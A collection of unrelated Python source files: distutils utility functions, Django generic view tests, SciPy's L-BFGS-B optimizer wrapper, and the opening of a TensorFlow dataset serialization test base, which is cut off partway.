s = s[:beg] + s[beg + 1:end - 1] + s[end:]
pos = m.end() - 2
if pos >= len(s):
words.append(s)
break
return words
def execute(func, args, msg=None, verbose=0, dry_run=0):
"""Perform some action that affects the outside world (eg. by
writing to the filesystem). Such actions are special because they
are disabled by the 'dry_run' flag. This method takes care of all
that bureaucracy for you; all you have to do is supply the
function to call and an argument tuple for it (to embody the
"external action" being performed), and an optional message to
print.
"""
if msg is None:
msg = '%s%r' % (func.__name__, args)
if msg[-2:] == ',)':
msg = msg[0:-2] + ')'
log.info(msg)
if not dry_run:
func(*args)
return
def strtobool(val):
"""Convert a string representation of truth to true (1) or false (0).
True values are 'y', 'yes', 't', 'true', 'on', and '1'; false values
are 'n', 'no', 'f', 'false', 'off', and '0'. Raises ValueError if
'val' is anything else.
"""
val = string.lower(val)
if val in ('y', 'yes', 't', 'true', 'on', '1'):
return 1
if val in ('n', 'no', 'f', 'false', 'off', '0'):
return 0
raise ValueError, 'invalid truth value %r' % (val,)
def byte_compile(py_files, optimize=0, force=0, prefix=None, base_dir=None, verbose=1, dry_run=0, direct=None):
"""Byte-compile a collection of Python source files to either .pyc
or .pyo files in the same directory. 'py_files' is a list of files
to compile; any files that don't end in ".py" are silently skipped.
'optimize' must be one of the following:
0 - don't optimize (generate .pyc)
1 - normal optimization (like "python -O")
2 - extra optimization (like "python -OO")
If 'force' is true, all files are recompiled regardless of
timestamps.
The source filename encoded in each bytecode file defaults to the
filenames listed in 'py_files'; you can modify these with 'prefix' and
'basedir'. 'prefix' is a string that will be stripped off of each
source filename, and 'base_dir' is a directory name that will be
prepended (after 'prefix' is stripped). You can supply either or both
(or neither) of 'prefix' and 'base_dir', as you wish.
If 'dry_run' is true, doesn't actually do anything that would
affect the filesystem.
Byte-compilation is either done directly in this interpreter process
with the standard py_compile module, or indirectly by writing a
temporary script and executing it. Normally, you should let
'byte_compile()' figure out to use direct compilation or not (see
the source for details). The 'direct' flag is used by the script
generated in indirect mode; unless you know what you're doing, leave
it set to None.
"""
if sys.dont_write_bytecode:
raise DistutilsByteCompileError('byte-compiling is disabled.')
if direct is None:
direct = __debug__ and optimize == 0
if not direct:
try:
from tempfile import mkstemp
script_fd, script_name = mkstemp('.py')
except ImportError:
from tempfile import mktemp
script_fd, script_name = None, mktemp('.py')
log.info("writing byte-compilation script '%s'", script_name)
if not dry_run:
if script_fd is not None:
script = os.fdopen(script_fd, 'w')
else:
script = open(script_name, 'w')
script.write('from distutils.util import byte_compile\nfiles = [\n')
script.write(string.join(map(repr, py_files), ',\n') + ']\n')
script.write('\nbyte_compile(files, optimize=%r, force=%r,\n prefix=%r, base_dir=%r,\n verbose=%r, dry_run=0,\n direct=1)\n' % (optimize, force, prefix, base_dir, verbose))
script.close()
cmd = [sys.executable, script_name]
if optimize == 1:
cmd.insert(1, '-O')
elif optimize == 2:
cmd.insert(1, '-OO')
spawn(cmd, dry_run=dry_run)
execute(os.remove, (script_name,), 'removing %s' % script_name, dry_run=dry_run)
else:
from py_compile import compile
for file in py_files:
if file[-3:] != '.py':
continue
cfile = file + (__debug__ and 'c' or 'o')
dfile = file
if prefix:
if file[:len(prefix)] != prefix:
raise ValueError, "invalid prefix: filename %r doesn't start with %r" % (
file, prefix)
dfile = dfile[len(prefix):]
if base_dir:
dfile = os.path.join(base_dir, dfile)
cfile_base = os.path.basename(cfile)
if direct:
if force or newer(file, cfile):
log.info('byte-compiling %s to %s', file, cfile_base)
if not dry_run:
compile(file, cfile, dfile)
else:
log.debug('skipping byte-compilation of %s to %s', file, cfile_base)
return
def rfc822_escape(header):
"""Return a version of the string escaped for inclusion in an
RFC-822 header, by ensuring there are 8 spaces space after each newline.
"""
lines = string.split(header, '\n')
header = string.join(lines, '\n' + ' ')
return header
|
|
from __future__ import unicode_literals
import time
import unittest
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpResponse
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.utils import require_jinja2
from django.urls import resolve
from django.views.generic import RedirectView, TemplateView, View
from . import views
class SimpleView(View):
"""
A simple view with a docstring.
"""
def get(self, request):
return HttpResponse('This is a simple view')
class SimplePostView(SimpleView):
post = SimpleView.get
class PostOnlyView(View):
def post(self, request):
return HttpResponse('This view only accepts POST')
class CustomizableView(SimpleView):
parameter = {}
def decorator(view):
view.is_decorated = True
return view
class DecoratedDispatchView(SimpleView):
@decorator
def dispatch(self, request, *args, **kwargs):
return super(DecoratedDispatchView, self).dispatch(request, *args, **kwargs)
class AboutTemplateView(TemplateView):
def get(self, request):
return self.render_to_response({})
def get_template_names(self):
return ['generic_views/about.html']
class AboutTemplateAttributeView(TemplateView):
template_name = 'generic_views/about.html'
def get(self, request):
return self.render_to_response(context={})
class InstanceView(View):
def get(self, request):
return self
class ViewTest(unittest.TestCase):
rf = RequestFactory()
def _assert_simple(self, response):
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'This is a simple view')
def test_no_init_kwargs(self):
"""
Test that a view can't be accidentally instantiated before deployment
"""
try:
SimpleView(key='value').as_view()
self.fail('Should not be able to instantiate a view')
except AttributeError:
pass
def test_no_init_args(self):
"""
Test that a view can't be accidentally instantiated before deployment
"""
try:
SimpleView.as_view('value')
self.fail('Should not be able to use non-keyword arguments instantiating a view')
except TypeError:
pass
def test_pathological_http_method(self):
"""
The edge case of a http request that spoofs an existing method name is caught.
"""
self.assertEqual(SimpleView.as_view()(
self.rf.get('/', REQUEST_METHOD='DISPATCH')
).status_code, 405)
def test_get_only(self):
"""
Test a view which only allows GET doesn't allow other methods.
"""
self._assert_simple(SimpleView.as_view()(self.rf.get('/')))
self.assertEqual(SimpleView.as_view()(self.rf.post('/')).status_code, 405)
self.assertEqual(SimpleView.as_view()(
self.rf.get('/', REQUEST_METHOD='FAKE')
).status_code, 405)
def test_get_and_head(self):
"""
Test a view which supplies a GET method also responds correctly to HEAD.
"""
self._assert_simple(SimpleView.as_view()(self.rf.get('/')))
response = SimpleView.as_view()(self.rf.head('/'))
self.assertEqual(response.status_code, 200)
def test_head_no_get(self):
"""
Test a view which supplies no GET method responds to HEAD with HTTP 405.
"""
response = PostOnlyView.as_view()(self.rf.head('/'))
self.assertEqual(response.status_code, 405)
def test_get_and_post(self):
"""
Test a view which only allows both GET and POST.
"""
self._assert_simple(SimplePostView.as_view()(self.rf.get('/')))
self._assert_simple(SimplePostView.as_view()(self.rf.post('/')))
self.assertEqual(SimplePostView.as_view()(
self.rf.get('/', REQUEST_METHOD='FAKE')
).status_code, 405)
def test_invalid_keyword_argument(self):
"""
Test that view arguments must be predefined on the class and can't
be named like a HTTP method.
"""
# Check each of the allowed method names
for method in SimpleView.http_method_names:
kwargs = dict(((method, "value"),))
with self.assertRaises(TypeError):
SimpleView.as_view(**kwargs)
# Check the case view argument is ok if predefined on the class...
CustomizableView.as_view(parameter="value")
# ...but raises errors otherwise.
with self.assertRaises(TypeError):
CustomizableView.as_view(foobar="value")
def test_calling_more_than_once(self):
"""
Test a view can only be called once.
"""
request = self.rf.get('/')
view = InstanceView.as_view()
self.assertNotEqual(view(request), view(request))
def test_class_attributes(self):
"""
Test that the callable returned from as_view() has proper
docstring, name and module.
"""
self.assertEqual(SimpleView.__doc__, SimpleView.as_view().__doc__)
self.assertEqual(SimpleView.__name__, SimpleView.as_view().__name__)
self.assertEqual(SimpleView.__module__, SimpleView.as_view().__module__)
def test_dispatch_decoration(self):
"""
Test that attributes set by decorators on the dispatch method
are also present on the closure.
"""
self.assertTrue(DecoratedDispatchView.as_view().is_decorated)
def test_options(self):
"""
Test that views respond to HTTP OPTIONS requests with an Allow header
appropriate for the methods implemented by the view class.
"""
request = self.rf.options('/')
view = SimpleView.as_view()
response = view(request)
self.assertEqual(200, response.status_code)
self.assertTrue(response['Allow'])
def test_options_for_get_view(self):
"""
Test that a view implementing GET allows GET and HEAD.
"""
request = self.rf.options('/')
view = SimpleView.as_view()
response = view(request)
self._assert_allows(response, 'GET', 'HEAD')
def test_options_for_get_and_post_view(self):
"""
Test that a view implementing GET and POST allows GET, HEAD, and POST.
"""
request = self.rf.options('/')
view = SimplePostView.as_view()
response = view(request)
self._assert_allows(response, 'GET', 'HEAD', 'POST')
def test_options_for_post_view(self):
"""
Test that a view implementing POST allows POST.
"""
request = self.rf.options('/')
view = PostOnlyView.as_view()
response = view(request)
self._assert_allows(response, 'POST')
def _assert_allows(self, response, *expected_methods):
"Assert allowed HTTP methods reported in the Allow response header"
response_allows = set(response['Allow'].split(', '))
self.assertEqual(set(expected_methods + ('OPTIONS',)), response_allows)
def test_args_kwargs_request_on_self(self):
"""
Test a view only has args, kwargs & request once `as_view`
has been called.
"""
bare_view = InstanceView()
view = InstanceView.as_view()(self.rf.get('/'))
for attribute in ('args', 'kwargs', 'request'):
self.assertNotIn(attribute, dir(bare_view))
self.assertIn(attribute, dir(view))
def test_direct_instantiation(self):
"""
It should be possible to use the view by directly instantiating it
without going through .as_view() (#21564).
"""
view = PostOnlyView()
response = view.dispatch(self.rf.head('/'))
self.assertEqual(response.status_code, 405)
@override_settings(ROOT_URLCONF='generic_views.urls')
class TemplateViewTest(SimpleTestCase):
rf = RequestFactory()
def _assert_about(self, response):
response.render()
self.assertContains(response, '<h1>About</h1>')
def test_get(self):
"""
Test a view that simply renders a template on GET
"""
self._assert_about(AboutTemplateView.as_view()(self.rf.get('/about/')))
def test_head(self):
"""
Test a TemplateView responds correctly to HEAD
"""
response = AboutTemplateView.as_view()(self.rf.head('/about/'))
self.assertEqual(response.status_code, 200)
def test_get_template_attribute(self):
"""
Test a view that renders a template on GET with the template name as
an attribute on the class.
"""
self._assert_about(AboutTemplateAttributeView.as_view()(self.rf.get('/about/')))
def test_get_generic_template(self):
"""
Test a completely generic view that renders a template on GET
with the template name as an argument at instantiation.
"""
self._assert_about(TemplateView.as_view(template_name='generic_views/about.html')(self.rf.get('/about/')))
def test_template_name_required(self):
"""
A template view must provide a template name.
"""
with self.assertRaises(ImproperlyConfigured):
self.client.get('/template/no_template/')
@require_jinja2
def test_template_engine(self):
"""
A template view may provide a template engine.
"""
request = self.rf.get('/using/')
view = TemplateView.as_view(template_name='generic_views/using.html')
self.assertEqual(view(request).render().content, b'DTL\n')
view = TemplateView.as_view(template_name='generic_views/using.html', template_engine='django')
self.assertEqual(view(request).render().content, b'DTL\n')
view = TemplateView.as_view(template_name='generic_views/using.html', template_engine='jinja2')
self.assertEqual(view(request).render().content, b'Jinja2\n')
def test_template_params(self):
"""
A generic template view passes kwargs as context.
"""
response = self.client.get('/template/simple/bar/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['foo'], 'bar')
self.assertIsInstance(response.context['view'], View)
def test_extra_template_params(self):
"""
A template view can be customized to return extra context.
"""
response = self.client.get('/template/custom/bar/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['foo'], 'bar')
self.assertEqual(response.context['key'], 'value')
self.assertIsInstance(response.context['view'], View)
def test_cached_views(self):
"""
A template view can be cached
"""
response = self.client.get('/template/cached/bar/')
self.assertEqual(response.status_code, 200)
time.sleep(1.0)
response2 = self.client.get('/template/cached/bar/')
self.assertEqual(response2.status_code, 200)
self.assertEqual(response.content, response2.content)
time.sleep(2.0)
# Let the cache expire and test again
response2 = self.client.get('/template/cached/bar/')
self.assertEqual(response2.status_code, 200)
self.assertNotEqual(response.content, response2.content)
def test_content_type(self):
response = self.client.get('/template/content_type/')
self.assertEqual(response['Content-Type'], 'text/plain')
def test_resolve_view(self):
match = resolve('/template/content_type/')
self.assertIs(match.func.view_class, TemplateView)
self.assertEqual(match.func.view_initkwargs['content_type'], 'text/plain')
def test_resolve_login_required_view(self):
match = resolve('/template/login_required/')
self.assertIs(match.func.view_class, TemplateView)
@override_settings(ROOT_URLCONF='generic_views.urls')
class RedirectViewTest(SimpleTestCase):
rf = RequestFactory()
def test_no_url(self):
"Without any configuration, returns HTTP 410 GONE"
response = RedirectView.as_view()(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 410)
def test_default_redirect(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_permanent_redirect(self):
"Permanent redirects are an option"
response = RedirectView.as_view(url='/bar/', permanent=True)(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 301)
self.assertEqual(response.url, '/bar/')
def test_temporary_redirect(self):
"Temporary redirects are an option"
response = RedirectView.as_view(url='/bar/', permanent=False)(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_include_args(self):
"GET arguments can be included in the redirected URL"
response = RedirectView.as_view(url='/bar/')(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
response = RedirectView.as_view(url='/bar/', query_string=True)(self.rf.get('/foo/?pork=spam'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/?pork=spam')
def test_include_urlencoded_args(self):
"GET arguments can be URL-encoded when included in the redirected URL"
response = RedirectView.as_view(url='/bar/', query_string=True)(
self.rf.get('/foo/?unicode=%E2%9C%93'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/?unicode=%E2%9C%93')
def test_parameter_substitution(self):
"Redirection URLs can be parameterized"
response = RedirectView.as_view(url='/bar/%(object_id)d/')(self.rf.get('/foo/42/'), object_id=42)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/42/')
def test_named_url_pattern(self):
"Named pattern parameter should reverse to the matching pattern"
response = RedirectView.as_view(pattern_name='artist_detail')(self.rf.get('/foo/'), pk=1)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '/detail/artist/1/')
def test_named_url_pattern_using_args(self):
response = RedirectView.as_view(pattern_name='artist_detail')(self.rf.get('/foo/'), 1)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '/detail/artist/1/')
def test_wrong_named_url_pattern(self):
"A wrong pattern name returns 410 GONE"
response = RedirectView.as_view(pattern_name='wrong.pattern_name')(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 410)
def test_redirect_POST(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.post('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_HEAD(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.head('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_OPTIONS(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.options('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_PUT(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.put('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_PATCH(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.patch('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_DELETE(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.delete('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_when_meta_contains_no_query_string(self):
"regression for #16705"
# we can't use self.rf.get because it always sets QUERY_STRING
response = RedirectView.as_view(url='/bar/')(self.rf.request(PATH_INFO='/foo/'))
self.assertEqual(response.status_code, 302)
def test_direct_instantiation(self):
"""
It should be possible to use the view without going through .as_view()
(#21564).
"""
view = RedirectView()
response = view.dispatch(self.rf.head('/foo/'))
self.assertEqual(response.status_code, 410)
class GetContextDataTest(unittest.TestCase):
def test_get_context_data_super(self):
test_view = views.CustomContextView()
context = test_view.get_context_data(kwarg_test='kwarg_value')
# the test_name key is inserted by the test classes parent
self.assertIn('test_name', context)
self.assertEqual(context['kwarg_test'], 'kwarg_value')
self.assertEqual(context['custom_key'], 'custom_value')
# test that kwarg overrides values assigned higher up
context = test_view.get_context_data(test_name='test_value')
self.assertEqual(context['test_name'], 'test_value')
def test_object_at_custom_name_in_context_data(self):
# Checks 'pony' key presence in dict returned by get_context_date
test_view = views.CustomSingleObjectView()
test_view.context_object_name = 'pony'
context = test_view.get_context_data()
self.assertEqual(context['pony'], test_view.object)
def test_object_in_get_context_data(self):
# Checks 'object' key presence in dict returned by get_context_date #20234
test_view = views.CustomSingleObjectView()
context = test_view.get_context_data()
self.assertEqual(context['object'], test_view.object)
class UseMultipleObjectMixinTest(unittest.TestCase):
rf = RequestFactory()
def test_use_queryset_from_view(self):
test_view = views.CustomMultipleObjectMixinView()
test_view.get(self.rf.get('/'))
# Don't pass queryset as argument
context = test_view.get_context_data()
self.assertEqual(context['object_list'], test_view.queryset)
def test_overwrite_queryset(self):
test_view = views.CustomMultipleObjectMixinView()
test_view.get(self.rf.get('/'))
queryset = [{'name': 'Lennon'}, {'name': 'Ono'}]
self.assertNotEqual(test_view.queryset, queryset)
# Overwrite the view's queryset with queryset from kwarg
context = test_view.get_context_data(object_list=queryset)
self.assertEqual(context['object_list'], queryset)
class SingleObjectTemplateResponseMixinTest(unittest.TestCase):
def test_template_mixin_without_template(self):
"""
We want to makes sure that if you use a template mixin, but forget the
template, it still tells you it's ImproperlyConfigured instead of
TemplateDoesNotExist.
"""
view = views.TemplateResponseWithoutTemplate()
with self.assertRaises(ImproperlyConfigured):
view.get_template_names()
|
|
"""
Functions
---------
.. autosummary::
:toctree: generated/
fmin_l_bfgs_b
"""
## License for the Python wrapper
## ==============================
## Copyright (c) 2004 David M. Cooke <[email protected]>
## Permission is hereby granted, free of charge, to any person obtaining a
## copy of this software and associated documentation files (the "Software"),
## to deal in the Software without restriction, including without limitation
## the rights to use, copy, modify, merge, publish, distribute, sublicense,
## and/or sell copies of the Software, and to permit persons to whom the
## Software is furnished to do so, subject to the following conditions:
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
## FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
## DEALINGS IN THE SOFTWARE.
## Modifications by Travis Oliphant and Enthought, Inc. for inclusion in SciPy
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy import array, asarray, float64, int32, zeros
from . import _lbfgsb
from .optimize import (approx_fprime, MemoizeJac, OptimizeResult,
_check_unknown_options, wrap_function,
_approx_fprime_helper)
__all__ = ['fmin_l_bfgs_b']
def fmin_l_bfgs_b(func, x0, fprime=None, args=(),
approx_grad=0,
bounds=None, m=10, factr=1e7, pgtol=1e-5,
epsilon=1e-8,
iprint=-1, maxfun=15000, maxiter=15000, disp=None,
callback=None):
"""
Minimize a function func using the L-BFGS-B algorithm.
Parameters
----------
func : callable f(x,*args)
Function to minimise.
x0 : ndarray
Initial guess.
fprime : callable fprime(x,*args), optional
The gradient of `func`. If None, then `func` returns the function
value and the gradient (``f, g = func(x, *args)``), unless
`approx_grad` is True in which case `func` returns only ``f``.
args : sequence, optional
Arguments to pass to `func` and `fprime`.
approx_grad : bool, optional
Whether to approximate the gradient numerically (in which case
`func` returns only the function value).
bounds : list, optional
``(min, max)`` pairs for each element in ``x``, defining
the bounds on that parameter. Use None or +-inf for one of ``min`` or
``max`` when there is no bound in that direction.
m : int, optional
The maximum number of variable metric corrections
used to define the limited memory matrix. (The limited memory BFGS
method does not store the full hessian but uses this many terms in an
approximation to it.)
factr : float, optional
The iteration stops when
``(f^k - f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= factr * eps``,
where ``eps`` is the machine precision, which is automatically
generated by the code. Typical values for `factr` are: 1e12 for
low accuracy; 1e7 for moderate accuracy; 10.0 for extremely
high accuracy.
pgtol : float, optional
The iteration will stop when
``max{|proj g_i | i = 1, ..., n} <= pgtol``
where ``pg_i`` is the i-th component of the projected gradient.
epsilon : float, optional
Step size used when `approx_grad` is True, for numerically
calculating the gradient
iprint : int, optional
Controls the frequency of output. ``iprint < 0`` means no output;
``iprint == 0`` means write messages to stdout; ``iprint > 1`` in
addition means write logging information to a file named
``iterate.dat`` in the current working directory.
disp : int, optional
If zero, then no output. If a positive number, then this over-rides
`iprint` (i.e., `iprint` gets the value of `disp`).
maxfun : int, optional
Maximum number of function evaluations.
maxiter : int, optional
Maximum number of iterations.
callback : callable, optional
Called after each iteration, as ``callback(xk)``, where ``xk`` is the
current parameter vector.
Returns
-------
x : array_like
Estimated position of the minimum.
f : float
Value of `func` at the minimum.
d : dict
Information dictionary.
* d['warnflag'] is
- 0 if converged,
- 1 if too many function evaluations or too many iterations,
- 2 if stopped for another reason, given in d['task']
* d['grad'] is the gradient at the minimum (should be 0 ish)
* d['funcalls'] is the number of function calls made.
* d['nit'] is the number of iterations.
See also
--------
minimize: Interface to minimization algorithms for multivariate
functions. See the 'L-BFGS-B' `method` in particular.
Notes
-----
License of L-BFGS-B (FORTRAN code):
The version included here (in fortran code) is 3.0
(released April 25, 2011). It was written by Ciyou Zhu, Richard Byrd,
and Jorge Nocedal <[email protected]>. It carries the following
condition for use:
This software is freely available, but we expect that all publications
describing work using this software, or all commercial products using it,
quote at least one of the references given below. This software is released
under the BSD License.
References
----------
* R. H. Byrd, P. Lu and J. Nocedal. A Limited Memory Algorithm for Bound
Constrained Optimization, (1995), SIAM Journal on Scientific and
Statistical Computing, 16, 5, pp. 1190-1208.
* C. Zhu, R. H. Byrd and J. Nocedal. L-BFGS-B: Algorithm 778: L-BFGS-B,
FORTRAN routines for large scale bound constrained optimization (1997),
ACM Transactions on Mathematical Software, 23, 4, pp. 550 - 560.
* J.L. Morales and J. Nocedal. L-BFGS-B: Remark on Algorithm 778: L-BFGS-B,
FORTRAN routines for large scale bound constrained optimization (2011),
ACM Transactions on Mathematical Software, 38, 1.
"""
# handle fprime/approx_grad
if approx_grad:
fun = func
jac = None
elif fprime is None:
fun = MemoizeJac(func)
jac = fun.derivative
else:
fun = func
jac = fprime
# build options
if disp is None:
disp = iprint
opts = {'disp': disp,
'iprint': iprint,
'maxcor': m,
'ftol': factr * np.finfo(float).eps,
'gtol': pgtol,
'eps': epsilon,
'maxfun': maxfun,
'maxiter': maxiter,
'callback': callback}
res = _minimize_lbfgsb(fun, x0, args=args, jac=jac, bounds=bounds,
**opts)
d = {'grad': res['jac'],
'task': res['message'],
'funcalls': res['nfev'],
'nit': res['nit'],
'warnflag': res['status']}
f = res['fun']
x = res['x']
return x, f, d
def _minimize_lbfgsb(fun, x0, args=(), jac=None, bounds=None,
disp=None, maxcor=10, ftol=2.2204460492503131e-09,
gtol=1e-5, eps=1e-8, maxfun=15000, maxiter=15000,
iprint=-1, callback=None, **unknown_options):
"""
Minimize a scalar function of one or more variables using the L-BFGS-B
algorithm.
Options
-------
disp : bool
Set to True to print convergence messages.
maxcor : int
The maximum number of variable metric corrections used to
define the limited memory matrix. (The limited memory BFGS
method does not store the full hessian but uses this many terms
in an approximation to it.)
factr : float
The iteration stops when ``(f^k -
f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= factr * eps``, where ``eps``
is the machine precision, which is automatically generated by
the code. Typical values for `factr` are: 1e12 for low
accuracy; 1e7 for moderate accuracy; 10.0 for extremely high
accuracy.
ftol : float
The iteration stops when ``(f^k -
f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= ftol``.
gtol : float
The iteration will stop when ``max{|proj g_i | i = 1, ..., n}
<= gtol`` where ``pg_i`` is the i-th component of the
projected gradient.
eps : float
Step size used for numerical approximation of the jacobian.
disp : int
Set to True to print convergence messages.
maxfun : int
Maximum number of function evaluations.
maxiter : int
Maximum number of iterations.
"""
_check_unknown_options(unknown_options)
m = maxcor
epsilon = eps
pgtol = gtol
factr = ftol / np.finfo(float).eps
x0 = asarray(x0).ravel()
n, = x0.shape
if bounds is None:
bounds = [(None, None)] * n
if len(bounds) != n:
raise ValueError('length of x0 != length of bounds')
# unbounded variables must use None, not +-inf, for optimizer to work properly
bounds = [(None if l == -np.inf else l, None if u == np.inf else u) for l, u in bounds]
if disp is not None:
if disp == 0:
iprint = -1
else:
iprint = disp
n_function_evals, fun = wrap_function(fun, ())
if jac is None:
def func_and_grad(x):
f = fun(x, *args)
g = _approx_fprime_helper(x, fun, epsilon, args=args, f0=f)
return f, g
else:
def func_and_grad(x):
f = fun(x, *args)
g = jac(x, *args)
return f, g
nbd = zeros(n, int32)
low_bnd = zeros(n, float64)
upper_bnd = zeros(n, float64)
bounds_map = {(None, None): 0,
(1, None): 1,
(1, 1): 2,
(None, 1): 3}
for i in range(0, n):
l, u = bounds[i]
if l is not None:
low_bnd[i] = l
l = 1
if u is not None:
upper_bnd[i] = u
u = 1
nbd[i] = bounds_map[l, u]
x = array(x0, float64)
f = array(0.0, float64)
g = zeros((n,), float64)
wa = zeros(2*m*n + 5*n + 11*m*m + 8*m, float64)
iwa = zeros(3*n, int32)
task = zeros(1, 'S60')
csave = zeros(1, 'S60')
lsave = zeros(4, int32)
isave = zeros(44, int32)
dsave = zeros(29, float64)
task[:] = 'START'
n_iterations = 0
while 1:
# x, f, g, wa, iwa, task, csave, lsave, isave, dsave = \
_lbfgsb.setulb(m, x, low_bnd, upper_bnd, nbd, f, g, factr,
pgtol, wa, iwa, task, iprint, csave, lsave,
isave, dsave)
task_str = task.tostring()
if task_str.startswith(b'FG'):
if n_function_evals[0] > maxfun:
task[:] = ('STOP: TOTAL NO. of f AND g EVALUATIONS '
'EXCEEDS LIMIT')
else:
# minimization routine wants f and g at the current x
# Overwrite f and g:
f, g = func_and_grad(x)
elif task_str.startswith(b'NEW_X'):
# new iteration
if n_iterations > maxiter:
task[:] = 'STOP: TOTAL NO. of ITERATIONS EXCEEDS LIMIT'
else:
n_iterations += 1
if callback is not None:
callback(x)
else:
break
task_str = task.tostring().strip(b'\x00').strip()
if task_str.startswith(b'CONV'):
warnflag = 0
elif n_function_evals[0] > maxfun:
warnflag = 1
elif n_iterations > maxiter:
warnflag = 1
else:
warnflag = 2
return OptimizeResult(fun=f, jac=g, nfev=n_function_evals[0],
nit=n_iterations, status=warnflag, message=task_str,
x=x, success=(warnflag == 0))
if __name__ == '__main__':
def func(x):
f = 0.25 * (x[0] - 1) ** 2
for i in range(1, x.shape[0]):
f += (x[i] - x[i-1] ** 2) ** 2
f *= 4
return f
def grad(x):
g = zeros(x.shape, float64)
t1 = x[1] - x[0] ** 2
g[0] = 2 * (x[0] - 1) - 16 * x[0] * t1
for i in range(1, g.shape[0] - 1):
t2 = t1
t1 = x[i + 1] - x[i] ** 2
g[i] = 8 * t2 - 16*x[i] * t1
g[-1] = 8 * t1
return g
def func_and_grad(x):
return func(x), grad(x)
class Problem(object):
def fun(self, x):
return func_and_grad(x)
factr = 1e7
pgtol = 1e-5
n = 25
m = 10
bounds = [(None, None)] * n
for i in range(0, n, 2):
bounds[i] = (1.0, 100)
for i in range(1, n, 2):
bounds[i] = (-100, 100)
x0 = zeros((n,), float64)
x0[:] = 3
x, f, d = fmin_l_bfgs_b(func, x0, fprime=grad, m=m,
factr=factr, pgtol=pgtol)
print(x)
print(f)
print(d)
x, f, d = fmin_l_bfgs_b(func, x0, approx_grad=1,
m=m, factr=factr, pgtol=pgtol)
print(x)
print(f)
print(d)
x, f, d = fmin_l_bfgs_b(func_and_grad, x0, approx_grad=0,
m=m, factr=factr, pgtol=pgtol)
print(x)
print(f)
print(d)
p = Problem()
x, f, d = fmin_l_bfgs_b(p.fun, x0, approx_grad=0,
m=m, factr=factr, pgtol=pgtol)
print(x)
print(f)
print(d)
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base class for testing serializable datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.python.data.experimental.ops import iterator_ops as contrib_iterator_ops
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.util import nest
def remove_variants(get_next_op):
# TODO(b/72408568): Remove this once session.run can get
# variant tensors.
"""Remove variants from a nest structure, so sess.run will execute."""
def _remove_variant(x):
if isinstance(x, ops.Tensor) and x.dtype == dtypes.variant:
return ()
else:
return x
return nest.map_structure(_remove_variant, get_next_op)
class DatasetSerializationTestBase(test.TestCase):
"""Base class for testing serializable datasets."""
def tearDown(self):
self._delete_ckpt()
# TODO(b/72657739): Remove sparse_tensor argument, which is to test the
# (deprecated) saveable `SparseTensorSliceDataset`, once the API
